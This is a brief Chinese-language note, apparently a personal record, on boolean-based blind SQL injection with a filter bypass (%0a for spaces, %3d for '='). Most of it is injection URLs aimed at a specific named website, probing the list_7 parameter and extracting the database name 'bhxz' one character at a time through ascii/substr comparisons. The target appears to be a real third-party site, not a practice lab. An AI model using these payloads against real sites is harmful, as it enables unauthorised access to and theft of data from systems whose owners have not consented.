布尔盲注测试

当过滤了空格和=
用%0a代替空格，%3d代替=

布尔盲注
https://blog.csdn.net/silence1_/article/details/90812612

例子：
http://www.bhxz.net/?list_7'%0aand%0adatabase()%3d'bhxz'%0aand%0a1%3d'1

爆数据库
http://www.bhxz.net/?list_7'%0aand%0adatabase()%3d'bhxz'%0aand%0a1%3d'1

'%0Aand%0A1=1
'%0aand%0adatabase()%3d'bhxz'%0aand%0a1%3d'1

 

ascii(substr(database(),1,1))
'%0aand%0aascii(substr(database(),1,1))>115%0aand%0a'1'%3d'1

爆数据库名
猜测数据库名的第一个字母
http://www.bhxz.net/?list_7%27%0Aand%0Aascii(substr(database(),1,1))%3E97%0Aand%0A1%3d%271 //正确
http://www.bhxz.net/?list_7%27%0Aand%0Aascii(substr(database(),1,1))%3E98%0Aand%0A%271%27%3d%271 //错误
所以推出数据库名的第一个字母的ascii值为98，对应字母小写字母b
由于域名是bhxz.net，所以猜测数据库名为bhxz
构造SQL语句进行判断：
http://www.bhxz.net/?list_7'%0aand%0adatabase()%3d'bhxz'%0aand%0a1%3d'1
页面返回正常

由此可得数据库名为bhxz
http://www.bhxz.net/?list_7'%0aand%0adatabase()%3d'bhxz'%0aand%0a1%3d'1